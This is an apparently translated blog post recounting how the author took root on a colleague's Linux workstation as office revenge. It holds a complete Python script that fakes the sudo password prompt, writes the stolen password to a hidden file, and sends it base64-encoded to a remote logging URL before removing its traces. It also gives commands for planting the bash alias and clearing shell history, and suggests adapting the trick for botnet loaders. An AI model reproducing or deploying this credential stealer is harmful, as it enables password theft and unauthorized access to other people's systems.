Linux - the story of one hacking

Hello World!
Today I would like to share with you one instructive story about how once I managed to get root access to a work computer of a colleague and how terribly easy it turned out to be.

Prehistory

The working day passed as it usually goes for any average developer: a monitor, keyboard, tea, cookies ... In general, nothing outstanding was, as always, expected. Tired of the long-running debugging of an application in Xdebug, I decided to leave the office and get a little fresh air to get my head (by the time “cast-iron”) in order.

Returning to the workplace, I did not have time to start working, when suddenly from the next table came the malicious voice of my colleague:

- Listen, it looks like your browser's process id is XXXX, right?
')
Running the command ps -A | grep opera, I saw that the pid is really the one that my colleague was talking about.

- So what? - I answered in a calm voice.
- Nothing - said a colleague and pressed "Enter" on the keyboard of your computer. My browser window closed in my eyes.

I immediately began to look for processes in the system that the remote shell could give. It was not ssh.
A colleague hinted that it was nc (netcat), the process of which, of course, was immediately killed.
We both laughed, discussed this funny incident, it turned out that there was in fact no hacking and that “nc” was launched from under my user at that moment while I was not in the workplace. Just for lulz.
The joke, in general, was a success, but subconsciously I decided that it was impossible to leave this business so simply, it was a challenge!

Pulp

Once in the icy winter season, right before the New Year, I decided that it was time to take revenge. But this time I wanted to completely grab access to the computer - get root.

New Year's preparations in the office created a hefty bustle and noise. It was the right moment, because a colleague after the incident began to block the screen when he was moving away from the workplace. I knew that today is the day when the probability that he will forget to make a lock is as high as possible.

Using a small “window” in my working time, I began to think of an action plan for hacking. The main problem that had to somehow be solved was of course directly obtaining the root account, since everything else is just a matter of technology. Began an active search of ideas on how it can be done at all.

A colleague was Linux Mint 14 "Nadia". Kernel version - 3.5. Although the kernel is not so old, the probability of quickly finding in a free access a working local exploit is close to zero. Of the services, apart from Apache, he didn’t really have anything, and he closed Apache for external access.

Leaving the idea behind the idea, it eventually dawned on me! And what if you try the easiest and most banal bash alias?
Having decided to check my guess, I run a terminal (Debian Squeeze), create a test.py file with the banal print “Hello, world!”, Save it in my home directory, execute the command:

alias sudo="$HOME/temp.py" 

after that I type:

 sudo mc 

result:

 Hello, world! 

Here it is! Absolutely legal "hole" in security. Trite, but effective.

And now the script!

 #!/usr/bin/env python # ..      ,   PEP #        (   !) import os, sys, time, subprocess, getpass, urllib, base64 url = 'http://example.com/log.php?data=%s' user = getpass.getuser() #    sudo passwd = getpass.getpass("[sudo] password for %s: " % user) msg = user + ':' + passwd home = os.path.expanduser('~') script = sys.argv[0] #        with open(os.path.join(home, ".xsession-name"), "a+") as f: f.write(msg + "\n") #   -     gateway urllib.urlopen(url % base64.b64encode(msg)) #     -      bashrc with open(os.path.join(home, '.bashrc'), 'r+') as f: lines = f.readlines()[:-1] f.seek(0) f.writelines(lines) f.truncate() #       time.sleep(2) print "Sorry, try again" # !     sudo subprocess.call(['sudo'] + sys.argv[1:]) # ..    ,        os.system('pkill python & rm %s' % script) 

In brief: the script imitates the sudo password request, intercepts the password and sends it to the specified server, where the information is simply written to a file.

Taking advantage of the temporary absence of a colleague in the workplace, I moved to his computer and began my “special operation”:

1. Create a permanent alias in bashrc:

 echo 'alias sudo="'$HOME'/.xsession-lock"' >> $HOME/.bashrc 

2. Create a file with a tricky name .xsession-lock, so as not to catch the eye when listing / home / user, and save our Python script to it.
3. Set permissions to execute .xsession-lock - chmod + x
4. Clean bash_history!

The first thing after his return, a colleague, waiting for a trick, carefully examined the bash_history, and without noticing anything, began to work.
After some time, I decided to check the log file on a remote server that saved the passwords, and here it is, the fish account of my dream - root!
Of course, to be precise, in fact, this is a password from a working user of a colleague, which gave me the opportunity to get root and gain a foothold in the system.

Later, I again waited for my colleague to leave the office and “conjured” over his computer as root, but, unfortunately, I miscalculated the time and got pierced! Alas, caught red-handed right on the site of "crime."

We laughed again, discussed the details of the “hacking”, and then celebrated the New Year in a friendly and fun way with the whole office.
Here is such a New Year's Eve story.

Conclusion

In the light of the fact that Valve released steam under linux, there appeared a likelihood of hamsters' outflow towards Linux-systems and, at the same time, the likelihood that gentlemen from black hat will focus their eyes on Linux.

Therefore, I would like this article to become another reminder that “the rescue of drowning people is the work of the drowning people themselves”.
Installing Linux, do not think about what you wear "diapers". Responsibility for the security of your information still lies with you!

PS The method described above may well be applied in an automated form, for example, when creating bot networks. According to this principle, it is possible to create a bootloader that will lie and wait meekly for the user to enter the password, be it sudo, or gksudo, and after that will turn the computer into a “zombie machine”.
In addition, popular distributions come with exactly these default settings, which allow you to crank the method from this article.
I hope that in the near future in the world of security * nix systems, nothing will change and some Lin'lokers and other nonsense will not start to appear.

PPS Hi Yanovsky !